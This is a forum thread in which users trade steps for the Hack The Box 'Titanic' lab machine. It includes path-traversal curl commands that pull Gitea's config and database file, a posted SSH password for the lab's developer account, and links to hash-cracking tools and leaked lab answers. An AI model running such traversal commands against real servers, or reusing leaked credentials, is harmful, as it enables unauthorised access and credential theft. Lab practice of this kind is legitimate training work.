Titanic Hack the Box Season 7 (Linux Easy)
by RedBlock - Saturday February 15, 2025 at 02:59 PM
#11
curl 'http://titanic.htb/download?ticket=../../../../../home/developer/gitea/data/gitea/conf/app.ini'
this is big!

(Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

do you know how to crack gitea hashes?
Reply
#12
ssh creds for developer
developer : 25282528
Hack the Box Season 8

https://t.me/+u1sCX38Xneo3OGM1
Reply
#13
(Feb 15, 2025, 07:41 PM)Saidakbarxon Wrote:
(Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
Reply
#14
Got `curl 'http://titanic.htb/download?ticket=../../../../../home/developer/gitea/data/gitea/conf/app.ini'` this is big!
Reply
#15
(Feb 15, 2025, 07:43 PM)LostGem Wrote: ssh creds for developer
developer : 25282528

how did you get that?
did you use the LFI?
Reply
#16
(Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

How did you find the gitea directory? I know why it's developer, but not why gitea
Reply
#17
https://gist.github.com/h4rithd/0c5da36a...71cf14e271
Reply
#18
(Feb 15, 2025, 07:44 PM)smwhck Wrote:
(Feb 15, 2025, 07:41 PM)Saidakbarxon Wrote:
(Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
I don't think you'll find anything useful in the file.

(Feb 15, 2025, 07:44 PM)smwhck Wrote:
(Feb 15, 2025, 07:41 PM)Saidakbarxon Wrote:
(Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
I don't think you'll find anything useful in the file.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#19
(Feb 15, 2025, 07:53 PM)Saidakbarxon Wrote:
(Feb 15, 2025, 07:44 PM)smwhck Wrote:
(Feb 15, 2025, 07:41 PM)Saidakbarxon Wrote:
(Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
I don't think you'll find anything useful in the file.

(Feb 15, 2025, 07:44 PM)smwhck Wrote:
(Feb 15, 2025, 07:41 PM)Saidakbarxon Wrote:
(Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
I don't think you'll find anything useful in the file.

there's developer password in it!
Reply
#20
(Feb 15, 2025, 07:51 PM)kyakeiuwu Wrote: https://gist.github.com/h4rithd/0c5da36a...71cf14e271

Thank you, that was very helpful
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 88 8,001 9 minutes ago
Last Post: ElCAESAR_97
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 10 603 2 hours ago
Last Post: chufoni
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 28 2,827 2 hours ago
Last Post: chufoni
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 375 93,501 2 hours ago
Last Post: Johe
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 604 92,608 2 hours ago
Last Post: Johe

Forum Jump:


 Users browsing this forum: 1 Guest(s)